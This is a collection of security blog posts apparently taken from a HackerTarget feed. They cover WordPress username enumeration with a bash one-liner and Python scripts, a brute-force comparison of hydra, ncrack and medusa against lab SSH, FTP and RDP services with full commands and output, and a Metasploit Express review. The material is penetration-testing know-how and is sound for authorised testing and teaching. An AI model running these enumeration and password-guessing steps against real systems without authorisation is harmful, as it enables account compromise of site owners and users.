HackerTarget.com feed, category "brute force" (https://hackertarget.com, Security Vulnerability Scanners and Assessments), retrieved Wed, 07 Dec 2022 00:19:57 +0000

WordPress User Enumeration
https://hackertarget.com/wordpress-user-enumeration/
Thu, 10 Oct 2019 14:12:41 +0000

These three enumeration techniques are a fast way to identify the users of a WordPress installation. Once valid usernames are known, a brute force attack against the login only has to guess the password, which makes it far more effective.

WordPress User Enumeration via Author Archives

Finding users by iterating through the author archives is a common technique that works on a default installation of every WordPress version. It only fails where a security plugin or a web server rule blocks the ?author= query or the author archive redirect.

Every user has a numeric ID that the application uses in the database and to reference the account. By requesting the author archive for each ID in turn, we quickly identify which IDs exist and the username behind each one (strictly, the URL slug or user_nicename, which WordPress derives from the login name by default). That includes the account created during installation, which is almost always ID 1 and is usually the administrator. This is not a new trick, and it is built into a number of WordPress security testing tools.

How does it work?

Make a simple HTTP request to https://wordpressexample.com/?author=1. You can do this in a browser: open the web developer tools, select the Network tab and look at the response to that request. WordPress answers with a 301 redirect to the canonical author URL, so it is the redirect response you want, not the page it leads to. If it worked you will see headers like these:

Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Date: Thu, 17 Oct 2019 23:12:26 GMT
Location: https://wordpressexample.com/author/fred/
Server: nginx/1.10.3 (Ubuntu)

The Location header in the response reveals that user ID 1 is "fred". ID 1 is the account created at install time, so the administrator here either chose the name fred at install or renamed the default admin account later. A 404 for a given ID means no such user exists (or the site blocks the redirect).

Bash One Liner - Get all the Usernames

Here is a quick bash one-liner that cycles through as many user IDs as you want and prints the usernames, for when you do not have a WordPress scanner such as WPScan or the Nmap NSE scripts to hand.

for i in {1..5}; do curl -s -L -i http://www.wordpress-site-to-test.com/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$" | tr -d '\r' | sort -u; done

Change the 5 to the number of user IDs you want to enumerate. For each ID the command pulls the username from either the Location header of the redirect or the "View all posts by" link in the HTML of the archive page, whichever the site's configuration produces; the trailing tr strips the carriage return curl leaves on header lines and sort -u collapses the duplicate when both forms appear.
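The logic the one-liner sketches, as an added example written for this page rather than code from the original post: a small Python 3 script (standard library only) that requests ?author=N without following the redirect, reads the slug from the Location header, falls back to the "View all posts by" title attribute when the site serves the archive directly, and treats a 404 as no such user. The fetcher is injected, so the constructed_fetch responses, the hostname wordpressexample.com and the two users fred and alice are all made up for the demonstration; urllib_fetch points the same logic at a real site.

```python
"""Enumerate WordPress usernames through the ?author=N redirect.

Added example for this post, not HackerTarget's code.  The network layer is a
callable returning (status, headers, body), so the enumeration logic runs
offline against the constructed responses below and can be pointed at a live
site with urllib_fetch().  Redirects are deliberately NOT followed: the leak
is the Location header of the 301 itself.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, Dict[str, str], str]   # (status, headers, body)
Fetcher = Callable[[str], Response]

# /author/<slug>/ in the canonical redirect; the slug is the user_nicename,
# which WordPress derives from the login name by default.
LOCATION_RE = re.compile(r"/author/([^/?#]+)/?", re.IGNORECASE)
# Fallback for sites that serve the archive at ?author=N without redirecting.
TITLE_RE = re.compile(r'title="View all posts by ([^"]+)"')


def username_from_location(location: str) -> Optional[str]:
    m = LOCATION_RE.search(location)
    return m.group(1) if m else None


def username_from_html(body: str) -> Optional[str]:
    m = TITLE_RE.search(body)
    return m.group(1) if m else None


def username_for_id(fetch: Fetcher, base_url: str, user_id: int) -> Optional[str]:
    """Resolve one user ID; None means no user (404) or the redirect is blocked."""
    status, headers, body = fetch(f"{base_url.rstrip('/')}/?author={user_id}")
    lower = {k.lower(): v for k, v in headers.items()}
    if status in (301, 302):
        return username_from_location(lower.get("location", ""))
    if status == 200:
        return username_from_html(body)
    return None


def enumerate_authors(fetch: Fetcher, base_url: str, max_id: int = 10) -> Dict[int, str]:
    """Map every user ID in 1..max_id that resolves to a username."""
    found: Dict[int, str] = {}
    for uid in range(1, max_id + 1):
        name = username_for_id(fetch, base_url, uid)
        if name:
            found[uid] = name
    return found


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 301 as an HTTPError instead of following it


def urllib_fetch(url: str, timeout: float = 10.0) -> Response:
    """Real fetcher for a live target (standard library only)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


def constructed_fetch(url: str) -> Response:
    """Constructed stand-in for a site with two users (IDs 1 and 2); not real traffic."""
    if url.endswith("?author=1"):
        return 301, {"Location": "https://wordpressexample.com/author/fred/"}, ""
    if url.endswith("?author=2"):
        # A site that does not redirect but serves the archive directly.
        return 200, {"Content-Type": "text/html"}, (
            '<a href="https://wordpressexample.com/author/alice/" '
            'title="View all posts by alice">alice</a>')
    return 404, {}, "<h1>Page not found</h1>"


if __name__ == "__main__":
    for uid, name in enumerate_authors(constructed_fetch, "https://wordpressexample.com", 5).items():
        print(f"ID {uid}: {name}")
```

Against a real site replace constructed_fetch with urllib_fetch. Stopping at the first 404 is tempting but wrong: deleted users leave gaps in the ID sequence, so walk the whole range you care about.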

WordPress Enumeration via JSON API

The REST API users endpoint may return a list of the site's users. Since WordPress 4.7.1 it only lists users who have published a post; in 4.7.0 and earlier every user was returned by default. Plugins can also disable or filter the endpoint, so an error or an empty list does not prove there are no other users.

https://wordpressexample.com/wp-json/wp/v2/users


WordPress Enumeration via the Login Form

Brute forcing the username through the login form is possible because the response differs for a valid and an invalid account.

Using a tool such as Burp Intruder in Burp Suite, load a list of candidate usernames and cycle through HTTP POST requests to the WordPress login form (wp-login.php), examining each response.

For an unknown account WordPress reports that the username is invalid or unknown; for an existing account it reports that the password entered for that username is incorrect. A response matching the "incorrect password" wording therefore confirms the username is valid (the exact wording varies between WordPress versions). With a confirmed username the same process can be repeated against the password field using a common password list, subject to whatever rate limiting or lockout the site enforces.
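Both the JSON endpoint and the login-form oracle, as an added Python 3 example (not code from the original post). The users JSON and the wp-login.php error boxes are constructed samples modelled on real WordPress output; the wp-login.php field names (log, pwd, wp-submit, redirect_to, testcookie) are the real ones, while the usernames fred, bob, carol and dave are invented for the demonstration.

```python
"""Two more WordPress username oracles: the REST users endpoint and wp-login.php.

Added example for this post, not HackerTarget's code.  The JSON and HTML
samples are constructed to mirror what WordPress returns; the error wording of
wp-login.php changes between versions, so the classifier matches the
distinguishing phrase rather than a whole sentence.
"""
import json
import re
import urllib.parse
from typing import Dict, List


def users_from_rest_json(body: str) -> List[Dict[str, object]]:
    """Parse /wp-json/wp/v2/users.  'slug' is the URL name (user_nicename),
    'name' the display name; neither is guaranteed to equal the login name."""
    return [{"id": u["id"], "slug": u["slug"], "name": u.get("name", "")}
            for u in json.loads(body)]


# An unknown account: "Invalid username." (older releases) or
# "Unknown username. Check again or try your email address." (5.x and later).
INVALID_USER_RE = re.compile(r"(Invalid username|Unknown username)", re.IGNORECASE)
# An existing account with a wrong password:
# "The password you entered for the username <strong>fred</strong> is incorrect."
WRONG_PASSWORD_RE = re.compile(r"password you entered for the (username|email address)",
                               re.IGNORECASE)


def classify_login_response(html: str) -> str:
    """'valid'   -> username exists (password rejected)
       'invalid' -> username unknown
       'unknown' -> neither phrase present: hardened site, lockout page, or a
                    plugin that unifies the two messages; draw no conclusion."""
    if WRONG_PASSWORD_RE.search(html):
        return "valid"
    if INVALID_USER_RE.search(html):
        return "invalid"
    return "unknown"


def login_form_body(username: str, password: str) -> str:
    """URL-encoded POST body for wp-login.php.  WordPress also requires the
    wordpress_test_cookie cookie to be sent back, or it rejects the login."""
    return urllib.parse.urlencode({
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1",
    })


def confirmed_usernames(responses: Dict[str, str]) -> List[str]:
    """Given {candidate: wp-login.php response body}, return those that exist."""
    return [u for u, html in responses.items() if classify_login_response(html) == "valid"]


# Constructed sample data (invented users; shaped like real WordPress output).
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Fred Smith", "slug": "fred",
     "link": "https://wordpressexample.com/author/fred/"},
    {"id": 3, "name": "Alice", "slug": "alice",
     "link": "https://wordpressexample.com/author/alice/"},
])
SAMPLE_LOGIN_RESPONSES = {
    "fred": '<div id="login_error"><strong>Error:</strong> The password you entered for '
            'the username <strong>fred</strong> is incorrect.</div>',
    "bob": '<div id="login_error"><strong>Error:</strong> Unknown username. Check again '
           'or try your email address.</div>',
    "carol": '<div id="login_error"><strong>Error:</strong> Invalid username.</div>',
    "dave": '<div id="login_error">Too many failed attempts, try again later.</div>',
}

if __name__ == "__main__":
    print([u["slug"] for u in users_from_rest_json(SAMPLE_USERS_JSON)])
    print(confirmed_usernames(SAMPLE_LOGIN_RESPONSES))
```

The "unknown" outcome matters: a site whose lockout plugin answers every attempt with the same page gives Intruder nothing to grep on, and treating that as "invalid" would silently discard real accounts.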

Conclusion

The author archive technique works even on sites that have taken the trouble to rename the admin account to reduce the chance of a successful brute force attack. Renaming admin is WordPress security 101, but these enumeration techniques show that whatever the username is, strong passwords (and rate limiting on the login) are essential.

Security Testing WordPress
https://hackertarget.com/security-testing-wordpress/
Tue, 19 Jul 2011 06:03:59 +0000


A couple of WordPress security assessment tools have popped up over the past few months, which has to be a good thing with the number of WordPress installations skyrocketing.

First, of course, there is HackerTarget's own WordPress Security Scan. It is externally facing and fairly high level: the system downloads some of your pages, analyses them, checks a few additional links and gives you a tidy little report detailing any security issues discovered. Our professional services provide an independent security review of your WordPress powered site with our WordPress Assessment.


Need an expert?
We will identify and validate ways to improve your security

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put, brute forcing works like this:

  • Plugins are found by testing URLs of the form http://myexampleblog.cm/wp-content/plugins/$pluginname for each candidate plugin name; the response code (typically 200 or 403 for a plugin directory that exists, 404 for one that does not) tells them apart.
  • Usernames can be brute forced with POST requests to the login form, since the error for an incorrect username differs from the error for an incorrect password.
  • Passwords can be brute forced (with a valid username) by hitting the login form.

Additionally, usernames can be gathered from some WordPress themes, from RSS feeds, and from author page URIs such as /blog/author/admin/.

The following tools and scripts can be used in your penetration testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient, and everyone has Metasploit installed... don't they? 😉

An NSE (Nmap Scripting Engine) script has been released for Nmap that does plugin brute forcing.

Just in the last few days a new tool, WPScan, hit the tubes. Still under development, it does a few different checks including brute forcing of accounts.

All the tools referenced above are aimed at external testing of WordPress installations. There are other options that involve installing plugins into the WordPress installation for deeper monitoring.

Brute Forcing Passwords with ncrack, hydra and medusa
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
Fri, 06 May 2011 04:18:08 +0000

Ready to test a number of password brute-forcing tools? Passwords are often the weakest link in any system, and a weak password will ultimately fall to brute force. Testing for weak passwords is an important part of security vulnerability assessments.

This article focuses on tools that brute force remote services, typically Internet-facing services that are accessible from anywhere in the world. The other kind of password brute-force attack is against the password hash: tools such as Hashcat crack captured password hashes offline on a local system, without touching the target at all.

The three tools assessed are Hydra, Medusa and Ncrack (from nmap.org).

Installation

Installation of all three tools was straightforward on Ubuntu Linux, using the standard configure, make, make install method to compile from source (unpack each tarball and change into its directory first). Alternatively, all three come pre-packaged on Kali. The versions in the commands below are current ones; the test output further down was captured in 2011 with Ncrack 0.4ALPHA, Hydra 6.3 and Medusa 2.0.

wget https://nmap.org/ncrack/dist/ncrack-0.7.tar.gz
tar xzf ncrack-0.7.tar.gz
cd ncrack-0.7
./configure
make
make install

wget https://github.com/vanhauser-thc/thc-hydra/archive/v9.0.tar.gz
tar xzf v9.0.tar.gz
cd thc-hydra-9.0
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz
tar xzf medusa-2.2.tar.gz
cd medusa-2.2
./configure
make
make install

Password List

I grabbed a list of 500 passwords from skullsecurity.org. Of course, you can find password lists with many thousands or even millions of entries; choose what is appropriate for the test, since the target type and the rate at which you can test are the major constraints.

wget https://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2

bzip2 -d 500-worst-passwords.txt.bz2

Series of tests

The following tests were performed against a Linux virtual machine running on VirtualBox. Speed will vary depending on whether the target is local, the latency of the connection, and even the processing power of the target system. Heavy brute forcing can load a target's CPU enough to cause a denial of service condition, and it can trigger account lockout policies that lock out legitimate users, so take care when testing production systems.

Test 1 - SSH

The first series of tests was against SSH. I set the root account's password to toor and added toor near the end of the 500-password list, at position 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds

Success again with Medusa, however it took over 10 times as long with the default settings of each tool.
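An added Python 3 example, not part of the original post, that turns the three tools' success lines into one credential list. SAMPLE_LOG is constructed from the output captured above (plus the ncrack FTP and RDP hits shown later in the post); the tool names, hosts and the toor password are the post's own, and the regular expressions assume the line formats shown here, which later tool versions may have changed.

```python
"""Normalise credentials reported by hydra, ncrack and medusa.

Added example for this post, not HackerTarget's code.  Each tool prints a
successful login in its own format, which is a nuisance when several tools
are run against the same estate.  The parser recognises all three success
lines, ignores progress chatter, and de-duplicates hits found by more than
one tool.  SAMPLE_LOG is constructed from the lines shown in the post.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class Credential(NamedTuple):
    tool: str
    host: str
    port: Optional[int]   # medusa does not print the port
    service: str
    user: str
    password: str


# hydra:  [22][ssh] host: 10.10.10.10   login: root   password: toor
HYDRA_RE = re.compile(
    r"^\[(\d+)\]\[([\w-]+)\]\s+host:\s+(\S+)\s+login:\s+(\S+)\s+password:\s+(.*)$")
# ncrack: 10.10.10.10 22/tcp ssh: 'root' 'toor'
NCRACK_RE = re.compile(
    r"^(\S+)\s+(\d+)/(?:tcp|udp)\s+([\w-]+):\s+'([^']*)'\s+'([^']*)'$")
# medusa: ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]
MEDUSA_RE = re.compile(
    r"^ACCOUNT FOUND:\s+\[([\w-]+)\]\s+Host:\s+(\S+)\s+User:\s+(\S+)\s+Password:\s+(.*?)\s+\[SUCCESS\]$")


def parse_line(line: str) -> Optional[Credential]:
    """One log line -> Credential, or None for anything that is not a hit."""
    line = line.strip()
    m = HYDRA_RE.match(line)
    if m:
        port, svc, host, user, pwd = m.groups()
        return Credential("hydra", host, int(port), svc, user, pwd)
    m = NCRACK_RE.match(line)
    if m:
        host, port, svc, user, pwd = m.groups()
        return Credential("ncrack", host, int(port), svc, user, pwd)
    m = MEDUSA_RE.match(line)
    if m:
        svc, host, user, pwd = m.groups()
        return Credential("medusa", host, None, svc, user, pwd)
    return None


def parse_output(text: str) -> List[Credential]:
    """All success lines in one or more concatenated tool logs, in order."""
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def unique_hits(creds: List[Credential]) -> List[Tuple[str, str, str, str]]:
    """Collapse the same (host, service, user, password) found by several tools."""
    seen, out = set(), []
    for c in creds:
        key = (c.host, c.service, c.user, c.password)
        if key not in seen:
            seen.add(key)
            out.append(key)
    return out


# Constructed from the captured runs in the post: progress lines interleaved
# with the success lines of all three tools.
SAMPLE_LOG = """\
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[22][ssh] host: 10.10.10.10   login: root   password: toor
Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'
10.10.10.10 21/tcp ftp: 'test' 'toor'
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'
"""

if __name__ == "__main__":
    for cred in parse_output(SAMPLE_LOG):
        print(cred)
    print(unique_hits(parse_output(SAMPLE_LOG)))
```

All three tools can also write results to a file (hydra -o, ncrack -oN, medusa -O), but the per-tool formats still differ, so the same parser applies to those files.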

Test 2 - Speed

Lets try and speed things up a bit.

Cranking Medusa up to 5 concurrent logins (its -t option) fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Running Ncrack with a more aggressive timing template (-T5) was a little faster, but not by much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster? Here I raised the number of parallel tasks to 32 with -t 32.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the response speed of the VirtualBox machine (each SSH attempt costs the target a full key exchange). Either way, the default speed is good for both tools.

Test 3 - FTP server

Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster....

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?

Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.

Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!

Ncrack can also brute force RDP accounts. Let's hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocol support varied between the tools at the time of these tests (2011; all three lists have grown considerably since, and note that the Hydra list as published omits SSH even though the SSH test above used it):

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MySQL, REXEC, IRC, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, Cisco AAA

Medusa - AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Ncrack - RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, Telnet

Conclusion

There is much more that could be tested for a more comprehensive review: other protocols, different targets, latency, and further tweaking of scan speeds and thread counts.

While ncrack had limited protocol support compared to Hydra and Medusa, the only conclusion from this little test is that on speed, reliability, and the ability to hit RDP services, ncrack wins!

Note:
The problems noted above regarding Hydra were addressed in Hydra 6.4, and after re-testing it can be confirmed that these issues are no longer present. From the changelog:

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would lose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* configure script now honors /etc/ld.so.conf.d/ directory

Metasploit Express Review
https://hackertarget.com/metasploit-express-review/
Wed, 02 Jun 2010 07:05:18 +0000

Announcement: Metasploit Express reached end of life on Jun 4th 2019.

The purchase of Metasploit by Rapid7 last year and the recent release of Metasploit Express have been big news in the security community.

I have finally gotten around to giving it a spin. So what is Metasploit Express? It is a web based front end for Metasploit that not only provides easy access to the underlying tool but also adds reporting and organisation to your penetration testing, allowing projects to be saved and results stored and tested.

It sure does beat running Metasploit and using a flat text file for your project database. 😉

I grabbed a copy of the Trial Version from the Metasploit website.

# chmod +x metasploit-3.4.0-linux-x64-installer.bin
# ./metasploit-3.4.0-linux-x64-installer.bin

Install was gui based and simple enough. Following the installation I was directed to web based console.

https://localhost:3790/

Create a user account.

Enter Product Key and Activate with Rapid7.com. A friendly reminder that we are in the world of commercial software.

Created Test1 and ran the initial scan.

Resource usage was very low during the scanning phase: memory usage was considerably less than Firefox, and it barely touched the sides of the CPU on my old Core 2 Duo.

Against my 3 hosts I ran the brute force module. All settings are defaults.

Note the windows host has login Administrator with password test and admin with password. The Linux host has password of test on the root account.

I was surprised that these were not discovered during the brute scans.

I redid the brute force module after changing the root password to "toor". Success! It seems the dictionary may not have been large enough for root / test.

Update: as noted by HD Moore selecting the deep option rather than default on the brute force would have hit on "test".

Using the session from the brute forced credentials I was able to gather data from the system with prebuilt scripts and get full access via a shell.

Onto the exploitation module.

A session was found on the Windows XP host; as expected, MS08-067 was exploited successfully.

Switching to the session tab (it is nice that while scans are running you can move about the console) reveals prebuilt modules that can be run against the session: collect system data, virtual desktop, access file system, and command shell. These are straight out of Meterpreter.

I grabbed some system data and found the display of the collected data is clear and easy to get to.

Accessing the virtual desktop I was able to connect using a java applet, the other choice to manually use a vnc viewer was also available.

Browsing the file system is all web based, fast and responsive, allowing browsing of the system drives looking for data to snarf.

Lastly direct access to the meterpreter shell is right there, giving you full access to the session through the web console.


During my testing I did not have a working NexPose Vulnerability Scanner install, however note that this is also an option for enumeration of the vulnerabilities and would be interesting to see in action.

Overall this is a quality product. Built on the underlying framework, the web based front end is a solid enhancement that is definitely worth the price: whether you run Metasploit daily and need the reporting and backend database, or only occasionally within your environment, it puts the power of the tool only a few clicks away.
